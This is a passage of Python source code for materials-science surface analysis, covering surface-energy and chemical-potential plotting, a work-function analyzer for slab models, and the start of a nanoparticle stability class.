format: Symbol("delu_el") where el is the name of the element.
miller_index (list): Miller index for a specific facet to get a
dictionary for.
            dmu_at_0 (bool): If True and the surface energies at the ends of the
                chemical potential range have opposite signs, the value is a list of
                three chemical potentials with the one in the center corresponding
                to a surface energy of 0. Useful for identifying unphysical ranges
                of surface energies and their chemical potential range.
return_se_dict (bool): Whether or not to return the corresponding
dictionary of surface energies
"""
chempot_range = sorted(chempot_range)
stable_urange_dict, se_dict = {}, {}
# Get all entries for a specific facet
for hkl in self.all_slab_entries.keys():
entries_in_hkl = []
# Skip this facet if this is not the facet we want
if miller_index and hkl != tuple(miller_index):
continue
if not no_clean:
entries_in_hkl.extend(self.all_slab_entries[hkl])
if not no_doped:
for entry in self.all_slab_entries[hkl]:
entries_in_hkl.extend(self.all_slab_entries[hkl][entry])
for entry in entries_in_hkl:
stable_urange_dict[entry] = []
se_dict[entry] = []
# if there is only one entry for this facet, then just give it the
# default urange, you can't make combinations with just 1 item
if len(entries_in_hkl) == 1:
stable_urange_dict[entries_in_hkl[0]] = chempot_range
u1, u2 = delu_dict.copy(), delu_dict.copy()
u1[ref_delu], u2[ref_delu] = chempot_range[0], chempot_range[1]
se = self.as_coeffs_dict[entries_in_hkl[0]]
se_dict[entries_in_hkl[0]] = [
sub_chempots(se, u1),
sub_chempots(se, u2),
]
continue
for pair in itertools.combinations(entries_in_hkl, 2):
# I'm assuming ref_delu was not set in delu_dict,
# so the solution should be for ref_delu
solution = self.get_surface_equilibrium(pair, delu_dict=delu_dict)
# Check if this solution is stable
if not solution:
continue
new_delu_dict = delu_dict.copy()
new_delu_dict[ref_delu] = solution[ref_delu]
stable_entry, gamma = self.get_stable_entry_at_u(
hkl, new_delu_dict, no_doped=no_doped, no_clean=no_clean
)
if stable_entry not in pair:
continue
# Now check if the solution is within the chempot range
if not chempot_range[0] <= solution[ref_delu] <= chempot_range[1]:
continue
for entry in pair:
stable_urange_dict[entry].append(solution[ref_delu])
se_dict[entry].append(gamma)
# Now check if all entries have 2 chempot values. If only
# one, we need to set the other value as either the upper
# limit or lower limit of the user provided chempot_range
new_delu_dict = delu_dict.copy()
for u in chempot_range:
new_delu_dict[ref_delu] = u
entry, gamma = self.get_stable_entry_at_u(
hkl, delu_dict=new_delu_dict, no_doped=no_doped, no_clean=no_clean
)
stable_urange_dict[entry].append(u)
se_dict[entry].append(gamma)
if dmu_at_0:
for entry, v in se_dict.items():
# if se are of opposite sign, determine chempot when se=0.
# Useful for finding a chempot range where se is unphysical
if not stable_urange_dict[entry]:
continue
if v[0] * v[1] < 0:
# solve for gamma=0
se = self.as_coeffs_dict[entry]
v.append(0)
stable_urange_dict[entry].append(solve(sub_chempots(se, delu_dict), ref_delu)[0])
# sort the chempot ranges for each facet
for entry, v in stable_urange_dict.items():
se_dict[entry] = [se for i, se in sorted(zip(v, se_dict[entry]))]
stable_urange_dict[entry] = sorted(v)
if return_se_dict:
return stable_urange_dict, se_dict
return stable_urange_dict
def color_palette_dict(self, alpha=0.35):
"""
Helper function to assign each facet a unique color using a dictionary.
Args:
alpha (float): Degree of transparency
return (dict): Dictionary of colors (r,g,b,a) when plotting surface
energy stability. The keys are individual surface entries where
clean surfaces have a solid color while the corresponding adsorbed
surface will be transparent.
"""
color_dict = {}
for hkl in self.all_slab_entries.keys():
rgb_indices = [0, 1, 2]
color = [0, 0, 0, 1]
random.shuffle(rgb_indices)
for i, ind in enumerate(rgb_indices):
if i == 2:
break
color[ind] = np.random.uniform(0, 1)
# Get the clean (solid) colors first
clean_list = np.linspace(0, 1, len(self.all_slab_entries[hkl]))
for i, clean in enumerate(self.all_slab_entries[hkl].keys()):
c = copy.copy(color)
c[rgb_indices[2]] = clean_list[i]
color_dict[clean] = c
# Now get the adsorbed (transparent) colors
for ads_entry in self.all_slab_entries[hkl][clean]:
c_ads = copy.copy(c)
c_ads[3] = alpha
color_dict[ads_entry] = c_ads
return color_dict
def chempot_vs_gamma_plot_one(
self,
plt,
entry,
ref_delu,
chempot_range,
delu_dict={},
delu_default=0,
label="",
JPERM2=False,
):
"""
Helper function to help plot the surface energy of a
single SlabEntry as a function of chemical potential.
Args:
plt (Plot): A plot.
entry (SlabEntry): Entry of the slab whose surface energy we want
to plot
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
label (str): Label of the slab for the legend.
            JPERM2 (bool): Whether to plot surface energy in J/m^2 (True) or
eV/A^2 (False)
Returns:
(Plot): Plot of surface energy vs chemical potential for one entry.
"""
chempot_range = sorted(chempot_range)
# use dashed lines for slabs that are not stoichiometric
# wrt bulk. Label with formula if nonstoichiometric
ucell_comp = self.ucell_entry.composition.reduced_composition
if entry.adsorbates:
s = entry.cleaned_up_slab
clean_comp = s.composition.reduced_composition
else:
clean_comp = entry.composition.reduced_composition
mark = "--" if ucell_comp != clean_comp else "-"
delu_dict = self.set_all_variables(delu_dict, delu_default)
delu_dict[ref_delu] = chempot_range[0]
gamma_min = self.as_coeffs_dict[entry]
gamma_min = gamma_min if type(gamma_min).__name__ == "float" else sub_chempots(gamma_min, delu_dict)
delu_dict[ref_delu] = chempot_range[1]
gamma_max = self.as_coeffs_dict[entry]
gamma_max = gamma_max if type(gamma_max).__name__ == "float" else sub_chempots(gamma_max, delu_dict)
gamma_range = [gamma_min, gamma_max]
se_range = np.array(gamma_range) * EV_PER_ANG2_TO_JOULES_PER_M2 if JPERM2 else gamma_range
mark = entry.mark if entry.mark else mark
c = entry.color if entry.color else self.color_dict[entry]
plt.plot(chempot_range, se_range, mark, color=c, label=label)
return plt
def chempot_vs_gamma(
self,
ref_delu,
chempot_range,
miller_index=(),
delu_dict={},
delu_default=0,
JPERM2=False,
show_unstable=False,
ylim=[],
plt=None,
no_clean=False,
no_doped=False,
use_entry_labels=False,
no_label=False,
):
"""
Plots the surface energy as a function of chemical potential.
Each facet will be associated with its own distinct colors.
Dashed lines will represent stoichiometries different from that
of the mpid's compound. Transparent lines indicates adsorption.
Args:
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
miller_index (list): Miller index for a specific facet to get a
dictionary for.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
            JPERM2 (bool): Whether to plot surface energy in J/m^2 (True) or
eV/A^2 (False)
show_unstable (bool): Whether or not to show parts of the surface
energy plot outside the region of stability.
ylim ([ymax, ymin]): Range of y axis
no_doped (bool): Whether to plot for the clean slabs only.
no_clean (bool): Whether to plot for the doped slabs only.
use_entry_labels (bool): If True, will label each slab configuration
according to their given label in the SlabEntry object.
no_label (bool): Option to turn off labels.
Returns:
(Plot): Plot of surface energy vs chempot for all entries.
"""
chempot_range = sorted(chempot_range)
plt = pretty_plot(width=8, height=7) if not plt else plt
axes = plt.gca()
for hkl in self.all_slab_entries.keys():
if miller_index and hkl != tuple(miller_index):
continue
# Get the chempot range of each surface if we only
# want to show the region where each slab is stable
if not show_unstable:
stable_u_range_dict = self.stable_u_range_dict(
chempot_range,
ref_delu,
no_doped=no_doped,
delu_dict=delu_dict,
miller_index=hkl,
)
already_labelled = []
label = ""
for clean_entry in self.all_slab_entries[hkl]:
urange = stable_u_range_dict[clean_entry] if not show_unstable else chempot_range
# Don't plot if the slab is unstable, plot if it is.
if urange != []:
label = clean_entry.label
if label in already_labelled:
label = None
else:
already_labelled.append(label)
if not no_clean:
if use_entry_labels:
label = clean_entry.label
if no_label:
label = ""
plt = self.chempot_vs_gamma_plot_one(
plt,
clean_entry,
ref_delu,
urange,
delu_dict=delu_dict,
delu_default=delu_default,
label=label,
JPERM2=JPERM2,
)
if not no_doped:
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
# Plot the adsorbed slabs
# Generate a label for the type of slab
urange = stable_u_range_dict[ads_entry] if not show_unstable else chempot_range
if urange != []:
if use_entry_labels:
label = ads_entry.label
if no_label:
label = ""
plt = self.chempot_vs_gamma_plot_one(
plt,
ads_entry,
ref_delu,
urange,
delu_dict=delu_dict,
delu_default=delu_default,
label=label,
JPERM2=JPERM2,
)
# Make the figure look nice
plt.ylabel(r"Surface energy (J/$m^{2}$)") if JPERM2 else plt.ylabel(r"Surface energy (eV/$\AA^{2}$)")
plt = self.chempot_plot_addons(plt, chempot_range, str(ref_delu).split("_")[1], axes, ylim=ylim)
return plt
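    # ------------------------------------------------------------------
    # Editor's sketch (not part of the original source): a minimal, assumed
    # usage of chempot_vs_gamma, where `plotter` stands for a
    # SurfaceEnergyPlotter instance (the class these methods belong to) and
    # delu_O for the oxygen chemical-potential symbol.
    #
    #     from sympy import Symbol
    #     delu_O = Symbol("delu_O")
    #     plt = plotter.chempot_vs_gamma(delu_O, [-2, 0], miller_index=(1, 1, 1))
    #     plt.show()
    # ------------------------------------------------------------------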
def monolayer_vs_BE(self, plot_eads=False):
"""
        Plots the binding energy as a function of monolayers (ML), i.e.
        the fractional area adsorbate density for all facets. For each
        facet at a specific monolayer, only plot the lowest binding energy.
Args:
plot_eads (bool): Option to plot the adsorption energy (binding
energy multiplied by number of adsorbates) instead.
Returns:
(Plot): Plot of binding energy vs monolayer for all facets.
"""
plt = pretty_plot(width=8, height=7)
for hkl in self.all_slab_entries.keys():
ml_be_dict = {}
for clean_entry in self.all_slab_entries[hkl].keys():
if self.all_slab_entries[hkl][clean_entry]:
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
if ads_entry.get_monolayer not in ml_be_dict.keys():
ml_be_dict[ads_entry.get_monolayer] = 1000
be = ads_entry.gibbs_binding_energy(eads=plot_eads)
if be < ml_be_dict[ads_entry.get_monolayer]:
ml_be_dict[ads_entry.get_monolayer] = be
# sort the binding energies and monolayers
# in order to properly draw a line plot
vals = sorted(ml_be_dict.items())
monolayers, BEs = zip(*vals)
plt.plot(monolayers, BEs, "-o", c=self.color_dict[clean_entry], label=hkl)
adsorbates = tuple(ads_entry.ads_entries_dict.keys())
plt.xlabel(" %s" * len(adsorbates) % adsorbates + " Coverage (ML)")
plt.ylabel("Adsorption Energy (eV)") if plot_eads else plt.ylabel("Binding Energy (eV)")
plt.legend()
plt.tight_layout()
return plt
@staticmethod
def chempot_plot_addons(plt, xrange, ref_el, axes, pad=2.4, rect=[-0.047, 0, 0.84, 1], ylim=[]):
"""
        Helper function to make a chempot plot look nicer.
Args:
            plt (Plot): Plot to add things to.
            xrange (list): xlim parameter
            ref_el (str): Element of the referenced chempot.
            axes (axes): Axes object from matplotlib
            pad (float): For tight layout
            rect (list): For tight layout
            ylim (ylim parameter):
        return (Plot): Modified plot with addons.
"""
# Make the figure look nice
plt.legend(bbox_to_anchor=(1.01, 1), loc=2, borderaxespad=0.0)
axes.set_xlabel(rf"Chemical potential $\Delta\mu_{{{ref_el}}}$ (eV)")
ylim = ylim if ylim else axes.get_ylim()
plt.xticks(rotation=60)
plt.ylim(ylim)
xlim = axes.get_xlim()
plt.xlim(xlim)
plt.tight_layout(pad=pad, rect=rect)
plt.plot([xrange[0], xrange[0]], ylim, "--k")
plt.plot([xrange[1], xrange[1]], ylim, "--k")
xy = [np.mean([xrange[1]]), np.mean(ylim)]
plt.annotate(f"{ref_el}-rich", xy=xy, xytext=xy, rotation=90, fontsize=17)
xy = [np.mean([xlim[0]]), np.mean(ylim)]
plt.annotate(f"{ref_el}-poor", xy=xy, xytext=xy, rotation=90, fontsize=17)
return plt
def BE_vs_clean_SE(
self,
delu_dict,
delu_default=0,
plot_eads=False,
annotate_monolayer=True,
JPERM2=False,
):
"""
For each facet, plot the clean surface energy against the most
stable binding energy.
Args:
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
plot_eads (bool): Option to plot the adsorption energy (binding
energy multiplied by number of adsorbates) instead.
annotate_monolayer (bool): Whether or not to label each data point
                with its monolayer (adsorbate density per unit primitive area)
            JPERM2 (bool): Whether to plot surface energy in J/m^2 (True) or
eV/A^2 (False)
Returns:
(Plot): Plot of clean surface energy vs binding energy for
all facets.
"""
plt = pretty_plot(width=8, height=7)
for hkl in self.all_slab_entries.keys():
for clean_entry in self.all_slab_entries[hkl].keys():
all_delu_dict = self.set_all_variables(delu_dict, delu_default)
if self.all_slab_entries[hkl][clean_entry]:
clean_se = self.as_coeffs_dict[clean_entry]
se = sub_chempots(clean_se, all_delu_dict)
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
ml = ads_entry.get_monolayer
be = ads_entry.gibbs_binding_energy(eads=plot_eads)
# Now plot the surface energy vs binding energy
plt.scatter(se, be)
if annotate_monolayer:
plt.annotate(f"{ml:.2f}", xy=[se, be], xytext=[se, be])
plt.xlabel(r"Surface energy ($J/m^2$)") if JPERM2 else plt.xlabel(r"Surface energy ($eV/\AA^2$)")
plt.ylabel("Adsorption Energy (eV)") if plot_eads else plt.ylabel("Binding Energy (eV)")
plt.tight_layout()
plt.xticks(rotation=60)
return plt
def surface_chempot_range_map(
self,
elements,
miller_index,
ranges,
incr=50,
no_doped=False,
no_clean=False,
delu_dict=None,
plt=None,
annotate=True,
show_unphyiscal_only=False,
fontsize=10,
):
"""
Adapted from the get_chempot_range_map() method in the PhaseDiagram
class. Plot the chemical potential range map based on surface
energy stability. Currently works only for 2-component PDs. At
the moment uses a brute force method by enumerating through the
range of the first element chempot with a specified increment
        and determines the chempot range of the second element for each
SlabEntry. Future implementation will determine the chempot range
map first by solving systems of equations up to 3 instead of 2.
Args:
elements (list): Sequence of elements to be considered as independent
variables. E.g., if you want to show the stability ranges of
                all Li-Co-O phases with respect to duLi and duO, you will supply
[Element("Li"), Element("O")]
miller_index ([h, k, l]): Miller index of the surface we are interested in
ranges ([[range1], [range2]]): List of chempot ranges (max and min values)
for the first and second element.
incr (int): Number of points to sample along the range of the first chempot
no_doped (bool): Whether or not to include doped systems.
no_clean (bool): Whether or not to include clean systems.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
annotate (bool): Whether to annotate each "phase" with the label of
the entry. If no label, uses the reduced formula
show_unphyiscal_only (bool): Whether to only show the shaded region where
surface energy is negative. Useful for drawing other chempot range maps.
"""
# Set up
delu_dict = delu_dict if delu_dict else {}
plt = pretty_plot(12, 8) if not plt else plt
el1, el2 = str(elements[0]), str(elements[1])
delu1 = Symbol(f"delu_{str(elements[0])}")
delu2 = Symbol(f"delu_{str(elements[1])}")
range1 = ranges[0]
range2 = ranges[1]
# Find a range map for each entry (surface). This part is very slow, will
# need to implement a more sophisticated method of getting the range map
vertices_dict = {}
for dmu1 in np.linspace(range1[0], range1[1], incr):
# Get chemical potential range of dmu2 for each increment of dmu1
new_delu_dict = delu_dict.copy()
new_delu_dict[delu1] = dmu1
range_dict, se_dict = self.stable_u_range_dict(
range2,
delu2,
dmu_at_0=True,
miller_index=miller_index,
no_doped=no_doped,
no_clean=no_clean,
delu_dict=new_delu_dict,
return_se_dict=True,
)
# Save the chempot range for dmu1 and dmu2
for entry, v in range_dict.items():
if not v:
continue
if entry not in vertices_dict.keys():
vertices_dict[entry] = []
selist = se_dict[entry]
vertices_dict[entry].append({delu1: dmu1, delu2: [v, selist]})
# Plot the edges of the phases
for entry, v in vertices_dict.items():
xvals, yvals = [], []
# Plot each edge of a phase within the borders
for ii, pt1 in enumerate(v):
# Determine if the surface energy at this lower range
# of dmu2 is negative. If so, shade this region.
if len(pt1[delu2][1]) == 3:
if pt1[delu2][1][0] < 0:
neg_dmu_range = [pt1[delu2][0][0], pt1[delu2][0][1]]
else:
neg_dmu_range = [pt1[delu2][0][1], pt1[delu2][0][2]]
# Shade the threshold and region at which se<=0
plt.plot([pt1[delu1], pt1[delu1]], neg_dmu_range, "k--")
elif pt1[delu2][1][0] < 0 and pt1[delu2][1][1] < 0:
                    # Any chempot at this point will result
# in se<0, shade the entire y range
if not show_unphyiscal_only:
plt.plot([pt1[delu1], pt1[delu1]], range2, "k--")
if ii == len(v) - 1:
break
pt2 = v[ii + 1]
if not show_unphyiscal_only:
plt.plot(
[pt1[delu1], pt2[delu1]],
[pt1[delu2][0][0], pt2[delu2][0][0]],
"k",
)
# Need these values to get a good position for labelling phases
xvals.extend([pt1[delu1], pt2[delu1]])
yvals.extend([pt1[delu2][0][0], pt2[delu2][0][0]])
# Plot the edge along the max x value
pt = v[-1]
delu1, delu2 = pt.keys()
xvals.extend([pt[delu1], pt[delu1]])
yvals.extend(pt[delu2][0])
if not show_unphyiscal_only:
plt.plot([pt[delu1], pt[delu1]], [pt[delu2][0][0], pt[delu2][0][-1]], "k")
if annotate:
# Label the phases
x = np.mean([max(xvals), min(xvals)])
y = np.mean([max(yvals), min(yvals)])
label = entry.label if entry.label else entry.composition.reduced_formula
plt.annotate(label, xy=[x, y], xytext=[x, y], fontsize=fontsize)
# Label plot
plt.xlim(range1)
plt.ylim(range2)
plt.xlabel(rf"$\Delta\mu_{{{el1}}} (eV)$", fontsize=25)
plt.ylabel(rf"$\Delta\mu_{{{el2}}} (eV)$", fontsize=25)
plt.xticks(rotation=60)
return plt
def set_all_variables(self, delu_dict, delu_default):
"""
Sets all chemical potential values and returns a dictionary where
the key is a sympy Symbol and the value is a float (chempot).
Args:
entry (SlabEntry): Computed structure entry of the slab
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
Returns:
Dictionary of set chemical potential values
"""
# Set up the variables
all_delu_dict = {}
for du in self.list_of_chempots:
if delu_dict and du in delu_dict.keys():
all_delu_dict[du] = delu_dict[du]
elif du == 1:
all_delu_dict[du] = du
else:
all_delu_dict[du] = delu_default
return all_delu_dict
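    # Editor's note (illustrative, assumed values): if list_of_chempots were
    # [1, Symbol("delu_O"), Symbol("delu_H")], delu_dict = {Symbol("delu_O"): -0.5}
    # and delu_default = 0, set_all_variables would return
    # {1: 1, Symbol("delu_O"): -0.5, Symbol("delu_H"): 0}.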
# def surface_phase_diagram(self, y_param, x_param, miller_index):
# return
#
# def wulff_shape_extrapolated_model(self):
# return
#
# def surface_pourbaix_diagram(self):
#
# return
#
# def surface_p_vs_t_phase_diagram(self):
#
# return
#
# def broken_bond_vs_gamma(self):
#
# return
def entry_dict_from_list(all_slab_entries):
"""
Converts a list of SlabEntry to an appropriate dictionary. It is
assumed that if there is no adsorbate, then it is a clean SlabEntry
and that adsorbed SlabEntry has the clean_entry parameter set.
Args:
all_slab_entries (list): List of SlabEntry objects
Returns:
(dict): Dictionary of SlabEntry with the Miller index as the main
key to a dictionary with a clean SlabEntry as the key to a
list of adsorbed SlabEntry.
"""
entry_dict = {}
for entry in all_slab_entries:
hkl = tuple(entry.miller_index)
if hkl not in entry_dict.keys():
entry_dict[hkl] = {}
if entry.clean_entry:
clean = entry.clean_entry
else:
clean = entry
if clean not in entry_dict[hkl].keys():
entry_dict[hkl][clean] = []
if entry.adsorbates:
entry_dict[hkl][clean].append(entry)
return entry_dict
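# Editor's note: for illustration only, the returned structure has the shape
# below (the entry names are hypothetical):
#
#     {(1, 1, 1): {clean_entry_111: [ads_entry_111_a, ads_entry_111_b]},
#      (1, 0, 0): {clean_entry_100: []}}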
class WorkFunctionAnalyzer:
"""
A class used for calculating the work function
from a slab model and visualizing the behavior
of the local potential along the slab.
.. attribute:: efermi
The Fermi energy
.. attribute:: locpot_along_c
        Local potential in eV at points along the c axis
.. attribute:: vacuum_locpot
The maximum local potential along the c direction for
the slab model, ie the potential at the vacuum
.. attribute:: work_function
The minimum energy needed to move an electron from the
surface to infinity. Defined as the difference between
the potential at the vacuum and the Fermi energy.
.. attribute:: slab
The slab structure model
.. attribute:: along_c
Points along the c direction with same
increments as the locpot in the c axis
.. attribute:: ave_locpot
        Mean of the minimum and maximum (vacuum) locpot along c
.. attribute:: sorted_sites
List of sites from the slab sorted along the c direction
.. attribute:: ave_bulk_p
The average locpot of the slab region along the c direction
"""
def __init__(self, structure, locpot_along_c, efermi, shift=0, blength=3.5):
"""
Initializes the WorkFunctionAnalyzer class.
Args:
structure (Structure): Structure object modelling the surface
locpot_along_c (list): Local potential along the c direction
            efermi (float): Fermi energy of the system
shift (float): Parameter to translate the slab (and
therefore the vacuum) of the slab structure, thereby
translating the plot along the x axis.
blength (float (Ang)): The longest bond length in the material.
Used to handle pbc for noncontiguous slab layers
"""
# ensure shift between 0 and 1
if shift < 0:
shift += -1 * int(shift) + 1
elif shift >= 1:
shift -= int(shift)
self.shift = shift
# properties that can be shifted
slab = structure.copy()
slab.translate_sites([i for i, site in enumerate(slab)], [0, 0, self.shift])
self.slab = slab
self.sorted_sites = sorted(self.slab, key=lambda site: site.frac_coords[2])
# Get the plot points between 0 and c
# increments of the number of locpot points
self.along_c = np.linspace(0, 1, num=len(locpot_along_c))
        # Shift the locpot profile by self.shift along c, wrapping values
        # that fall outside the [0, 1) cell back around
locpot_along_c_mid, locpot_end, locpot_start = [], [], []
for i, s in enumerate(self.along_c):
j = s + self.shift
if j > 1:
locpot_start.append(locpot_along_c[i])
elif j < 0:
locpot_end.append(locpot_along_c[i])
else:
locpot_along_c_mid.append(locpot_along_c[i])
self.locpot_along_c = locpot_start + locpot_along_c_mid + locpot_end
# identify slab region
self.slab_regions = get_slab_regions(self.slab, blength=blength)
# get the average of the signal in the bulk-like region of the
# slab, i.e. the average of the oscillating region. This gives
# a rough appr. of the potential in the interior of the slab
bulk_p = []
for r in self.slab_regions:
bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if r[1] >= self.along_c[i] > r[0]])
if len(self.slab_regions) > 1:
bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if self.slab_regions[1][1] <= self.along_c[i]])
bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if self.slab_regions[0][0] >= self.along_c[i]])
self.ave_bulk_p = np.mean(bulk_p)
# shift independent quantities
self.efermi = efermi
self.vacuum_locpot = max(self.locpot_along_c)
# get the work function
self.work_function = self.vacuum_locpot - self.efermi
# for setting ylim and annotating
self.ave_locpot = (self.vacuum_locpot - min(self.locpot_along_c)) / 2
def get_locpot_along_slab_plot(self, label_energies=True, plt=None, label_fontsize=10):
"""
Returns a plot of the local potential (eV) vs the
position along the c axis of the slab model (Ang)
Args:
label_energies (bool): Whether to label relevant energy
quantities such as the work function, Fermi energy,
vacuum locpot, bulk-like locpot
plt (plt): Matplotlib pylab object
label_fontsize (float): Fontsize of labels
Returns plt of the locpot vs c axis
"""
plt = pretty_plot(width=6, height=4) if not plt else plt
# plot the raw locpot signal along c
plt.plot(self.along_c, self.locpot_along_c, "b--")
# Get the local averaged signal of the locpot along c
xg, yg = [], []
for i, p in enumerate(self.locpot_along_c):
# average signal is just the bulk-like potential when in the slab region
in_slab = False
for r in self.slab_regions:
if r[0] <= self.along_c[i] <= r[1]:
in_slab = True
if len(self.slab_regions) > 1:
if self.along_c[i] >= self.slab_regions[1][1]:
in_slab = True
if self.along_c[i] <= self.slab_regions[0][0]:
in_slab = True
if in_slab:
yg.append(self.ave_bulk_p)
xg.append(self.along_c[i])
elif p < self.ave_bulk_p:
yg.append(self.ave_bulk_p)
xg.append(self.along_c[i])
else:
yg.append(p)
xg.append(self.along_c[i])
xg, yg = zip(*sorted(zip(xg, yg)))
plt.plot(xg, yg, "r", linewidth=2.5, zorder=-1)
# make it look nice
if label_energies:
plt = self.get_labels(plt, label_fontsize=label_fontsize)
plt.xlim([0, 1])
plt.ylim([min(self.locpot_along_c), self.vacuum_locpot + self.ave_locpot * 0.2])
plt.xlabel(r"Fractional coordinates ($\hat{c}$)", fontsize=25)
plt.xticks(fontsize=15, rotation=45)
plt.ylabel(r"Potential (eV)", fontsize=25)
plt.yticks(fontsize=15)
return plt
def get_labels(self, plt, label_fontsize=10):
"""
Handles the optional labelling of the plot with relevant quantities
Args:
plt (plt): Plot of the locpot vs c axis
label_fontsize (float): Fontsize of labels
Returns Labelled plt
"""
# center of vacuum and bulk region
if len(self.slab_regions) > 1:
label_in_vac = (self.slab_regions[0][1] + self.slab_regions[1][0]) / 2
if abs(self.slab_regions[0][0] - self.slab_regions[0][1]) > abs(
self.slab_regions[1][0] - self.slab_regions[1][1]
):
label_in_bulk = self.slab_regions[0][1] / 2
else:
label_in_bulk = (self.slab_regions[1][1] + self.slab_regions[1][0]) / 2
else:
label_in_bulk = (self.slab_regions[0][0] + self.slab_regions[0][1]) / 2
if self.slab_regions[0][0] > 1 - self.slab_regions[0][1]:
label_in_vac = self.slab_regions[0][0] / 2
else:
label_in_vac = (1 + self.slab_regions[0][1]) / 2
plt.plot([0, 1], [self.vacuum_locpot] * 2, "b--", zorder=-5, linewidth=1)
xy = [label_in_bulk, self.vacuum_locpot + self.ave_locpot * 0.05]
plt.annotate(
f"$V_{{vac}}={self.vacuum_locpot:.2f}$",
xy=xy,
xytext=xy,
color="b",
fontsize=label_fontsize,
)
# label the fermi energy
plt.plot([0, 1], [self.efermi] * 2, "g--", zorder=-5, linewidth=3)
xy = [label_in_bulk, self.efermi + self.ave_locpot * 0.05]
plt.annotate(
f"$E_F={self.efermi:.2f}$",
xytext=xy,
xy=xy,
fontsize=label_fontsize,
color="g",
)
# label the bulk-like locpot
plt.plot([0, 1], [self.ave_bulk_p] * 2, "r--", linewidth=1.0, zorder=-1)
xy = [label_in_vac, self.ave_bulk_p + self.ave_locpot * 0.05]
plt.annotate(
f"$V^{{interior}}_{{slab}}={self.ave_bulk_p:.2f}$",
xy=xy,
xytext=xy,
color="r",
fontsize=label_fontsize,
)
# label the work function as a barrier
plt.plot(
[label_in_vac] * 2,
[self.efermi, self.vacuum_locpot],
"k--",
zorder=-5,
linewidth=2,
)
xy = [label_in_vac, self.efermi + self.ave_locpot * 0.05]
plt.annotate(
rf"$\Phi={self.work_function:.2f}$",
xy=xy,
xytext=xy,
fontsize=label_fontsize,
)
return plt
def is_converged(self, min_points_frac=0.015, tol=0.0025):
"""
A well converged work function should have a flat electrostatic
        potential within some distance (min_points_frac) about where the peak
electrostatic potential is found along the c direction of the
slab. This is dependent on the size of the slab.
Args:
            min_points_frac (float): Fraction of the total number of locpot
                data points, taken +/- the point where the electrostatic
                potential is at its peak along the c direction.
tol (float): If the electrostatic potential stays the same
within this tolerance, within the min_points, it is converged.
Returns a bool (whether or not the work function is converged)
"""
conv_within = tol * (max(self.locpot_along_c) - min(self.locpot_along_c))
min_points = int(min_points_frac * len(self.locpot_along_c))
peak_i = self.locpot_along_c.index(self.vacuum_locpot)
all_flat = []
for i in range(len(self.along_c)):
if peak_i - min_points < i < peak_i + min_points:
if abs(self.vacuum_locpot - self.locpot_along_c[i]) > conv_within:
all_flat.append(False)
else:
all_flat.append(True)
return all(all_flat)
@staticmethod
def from_files(poscar_filename, locpot_filename, outcar_filename, shift=0, blength=3.5):
"""
:param poscar_filename: POSCAR file
:param locpot_filename: LOCPOT file
:param outcar_filename: OUTCAR file
:param shift: shift
:param blength: The longest bond length in the material.
Used to handle pbc for noncontiguous slab layers
:return: WorkFunctionAnalyzer
"""
p = Poscar.from_file(poscar_filename)
l = Locpot.from_file(locpot_filename)
o = Outcar(outcar_filename)
return WorkFunctionAnalyzer(
p.structure,
l.get_average_along_axis(2),
o.efermi,
shift=shift,
blength=blength,
)
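# Editor's sketch (not part of the original source): typical use of
# WorkFunctionAnalyzer, assuming the VASP output files are available locally.
#
#     wfa = WorkFunctionAnalyzer.from_files("POSCAR", "LOCPOT", "OUTCAR")
#     print(wfa.work_function)          # vacuum level minus the Fermi energy
#     if wfa.is_converged():
#         wfa.get_locpot_along_slab_plot().show()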
class NanoscaleStability:
"""
A class for analyzing the stability of nanoparticles of different
polymorphs with respect to size. The Wulff shape will be the
model for the nanoparticle. Stability will be determined by
an energetic competition between the weighted surface energy
(surface energy of the Wulff shape) and the bulk energy. A
future release will include a 2D phase diagram (e.g. wrt size
vs chempot for adsorbed or nonstoichiometric surfaces). Based
on the following work:
Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale
stabilization of sodium oxides: Implications for Na-O2
batteries. Nano Letters, 14(2), 1016–1020.
https://doi.org/10.1021/nl404557w
.. attribute:: se_analyzers
List of SurfaceEnergyPlotter objects. Each item corresponds to a
different polymorph.
.. attribute:: symprec
See WulffShape.
"""
def __init__(self, se_analyzers, symprec=1e-5):
"""
Analyzes the nanoscale stability of different polymorphs.
"""
self.se_analyzers = se_analyzers
self.symprec = symprec
def solve_equilibrium_point(self, analyzer1, analyzer2, delu_dict={}, delu_default=0, units="nanometers"):
"""
Gives the radial size of two particles where equilibrium is reached
between both particles. NOTE: the solution here is not the same
as the solution visualized in the plot because solving for r
requires that both the total surface area and volume of the
particles are functions of r.
Args:
analyzer1 (SurfaceEnergyPlotter): Analyzer associated with the
first polymorph
analyzer2 (SurfaceEnergyPlotter): Analyzer associated with the
second polymorph
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
units (str): Can be nanometers or Angstrom
Returns:
Particle radius in nm
"""
# Set up
